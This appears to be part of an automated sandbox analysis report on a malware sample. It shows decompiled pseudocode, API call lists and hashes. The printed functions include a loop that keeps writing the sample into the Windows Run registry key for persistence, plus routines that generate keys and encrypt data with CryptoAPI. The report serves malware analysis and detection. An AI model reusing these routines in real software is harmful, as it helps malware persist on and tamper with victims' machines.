                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          							if(_v40 != 0) {
                                                                                                                                                                                                                                                                          								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                          								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          								 *_a12 = _v12;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                          								 *_a16 = _v44;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04005b56
                                                                                                                                                                                                                                                                          0x04005b61
                                                                                                                                                                                                                                                                          0x04005b85
                                                                                                                                                                                                                                                                          0x04005b92
                                                                                                                                                                                                                                                                          0x04005b95
                                                                                                                                                                                                                                                                          0x04005b9c
                                                                                                                                                                                                                                                                          0x04005ba3
                                                                                                                                                                                                                                                                          0x04005bbc
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005bcb
                                                                                                                                                                                                                                                                          0x04005bd7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bde
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005bc3
                                                                                                                                                                                                                                                                          0x04005be6
                                                                                                                                                                                                                                                                          0x04005bf6
                                                                                                                                                                                                                                                                          0x04005bfc
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005c09
                                                                                                                                                                                                                                                                          0x04005c10
                                                                                                                                                                                                                                                                          0x04005c17
                                                                                                                                                                                                                                                                          0x04005c30
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c59
                                                                                                                                                                                                                                                                          0x04005c68
                                                                                                                                                                                                                                                                          0x04005c71
                                                                                                                                                                                                                                                                          0x04005c7a
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c87
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005c37
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005ca4
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005cb9
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cc7
                                                                                                                                                                                                                                                                          0x04005cab
                                                                                                                                                                                                                                                                          0x04005c8f
                                                                                                                                                                                                                                                                          0x04005c03
                                                                                                                                                                                                                                                                          0x04005ccf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B7F
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B8C
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 808621155-0
                                                                                                                                                                                                                                                                          • Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04006CF0() {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                          				char* _t26;
                                                                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                                                                          				char* _t32;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                          				_t32 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                          					_v24 = 0x20;
                                                                                                                                                                                                                                                                          					_v20 = 3;
                                                                                                                                                                                                                                                                          					_t30 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t24;
                                                                                                                                                                                                                                                                          					if(_v28 == 0) {
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          						_t26 =  *0x4011890; // 0x4013fa6
                                                                                                                                                                                                                                                                          						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v16);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04006cf6
                                                                                                                                                                                                                                                                          0x04006cfa
                                                                                                                                                                                                                                                                          0x04006d0a
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d0c
                                                                                                                                                                                                                                                                          0x04006d13
                                                                                                                                                                                                                                                                          0x04006d25
                                                                                                                                                                                                                                                                          0x04006d30
                                                                                                                                                                                                                                                                          0x04006d38
                                                                                                                                                                                                                                                                          0x04006d3a
                                                                                                                                                                                                                                                                          0x04006d41
                                                                                                                                                                                                                                                                          0x04006d56
                                                                                                                                                                                                                                                                          0x04006d61
                                                                                                                                                                                                                                                                          0x04006d67
                                                                                                                                                                                                                                                                          0x04006d6e
                                                                                                                                                                                                                                                                          0x04006d70
                                                                                                                                                                                                                                                                          0x04006d74
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d7e
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d88
                                                                                                                                                                                                                                                                          0x04006d94

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                                                                          				intOrPtr* _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v16 = _t79;
                                                                                                                                                                                                                                                                          					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t80;
                                                                                                                                                                                                                                                                          					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                          						_v24 = 0x1000;
                                                                                                                                                                                                                                                                          						_v20 = 0x1000;
                                                                                                                                                                                                                                                                          						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
                                                                                                                                                                                                                                                                          						if(_t85 != 0) {
                                                                                                                                                                                                                                                                          							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                          							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                          							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                          								_v40 = E04008770(_t170, 0xa);
                                                                                                                                                                                                                                                                          								_v36 = E040087D0(0xffffffff);
                                                                                                                                                                                                                                                                          								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          								_v32 = _t90;
                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                          									_v44 = _a8;
                                                                                                                                                                                                                                                                          									E04007B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                          									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                          									if(_t94 != 0) {
                                                                                                                                                                                                                                                                          										_v48 = _a12;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                          										_v60 = 0;
                                                                                                                                                                                                                                                                          										_v56 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                          										_v52 = _v48;
                                                                                                                                                                                                                                                                          										E040085D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                          										E04008650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                          										E040085D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                          										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                          										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                          0x04008376
                                                                                                                                                                                                                                                                          0x04008381
                                                                                                                                                                                                                                                                          0x040085c0
                                                                                                                                                                                                                                                                          0x040085c6
                                                                                                                                                                                                                                                                          0x040083b1
                                                                                                                                                                                                                                                                          0x040083bf
                                                                                                                                                                                                                                                                          0x040083c5
                                                                                                                                                                                                                                                                          0x040083d6
                                                                                                                                                                                                                                                                          0x040083dc
                                                                                                                                                                                                                                                                          0x040083e3
                                                                                                                                                                                                                                                                          0x040083f3
                                                                                                                                                                                                                                                                          0x040083fa
                                                                                                                                                                                                                                                                          0x0400841b
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008431
                                                                                                                                                                                                                                                                          0x04008435
                                                                                                                                                                                                                                                                          0x0400843b
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x0400844e
                                                                                                                                                                                                                                                                          0x0400845b
                                                                                                                                                                                                                                                                          0x0400846b
                                                                                                                                                                                                                                                                          0x04008471
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x04008481
                                                                                                                                                                                                                                                                          0x04008490
                                                                                                                                                                                                                                                                          0x040084a8
                                                                                                                                                                                                                                                                          0x040084b2
                                                                                                                                                                                                                                                                          0x040084bb
                                                                                                                                                                                                                                                                          0x040084c8
                                                                                                                                                                                                                                                                          0x040084da
                                                                                                                                                                                                                                                                          0x040084e2
                                                                                                                                                                                                                                                                          0x040084ec
                                                                                                                                                                                                                                                                          0x040084f9
                                                                                                                                                                                                                                                                          0x04008504
                                                                                                                                                                                                                                                                          0x04008511
                                                                                                                                                                                                                                                                          0x04008525
                                                                                                                                                                                                                                                                          0x0400853c
                                                                                                                                                                                                                                                                          0x04008550
                                                                                                                                                                                                                                                                          0x04008576
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400857e
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x0400858c
                                                                                                                                                                                                                                                                          0x04008478
                                                                                                                                                                                                                                                                          0x0400843e
                                                                                                                                                                                                                                                                          0x04008425
                                                                                                                                                                                                                                                                          0x04008596
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085a3
                                                                                                                                                                                                                                                                          0x040085ad
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x040085ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040085ad

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                            • Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                            • Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                            • Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 487564122-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040012D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = _v8;
                                                                                                                                                                                                                                                                          					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          					while( *0x4014370 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                          						if(_t26 == 0) {
                                                                                                                                                                                                                                                                          							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                          							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                          							RegCloseKey(_v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x040012d9
                                                                                                                                                                                                                                                                          0x040012e0
                                                                                                                                                                                                                                                                          0x040012e9
                                                                                                                                                                                                                                                                          0x040012ec
                                                                                                                                                                                                                                                                          0x040012f3
                                                                                                                                                                                                                                                                          0x04001301
                                                                                                                                                                                                                                                                          0x04001314
                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                          0x04001316
                                                                                                                                                                                                                                                                          0x0400131d
                                                                                                                                                                                                                                                                          0x04001337
                                                                                                                                                                                                                                                                          0x0400133f
                                                                                                                                                                                                                                                                          0x0400134b
                                                                                                                                                                                                                                                                          0x04001368
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x04001372
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x0400137d
                                                                                                                                                                                                                                                                          0x040012fc
                                                                                                                                                                                                                                                                          0x0400138d

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 04001345
                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04001372
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0400137D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                          • Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                          • String ID:
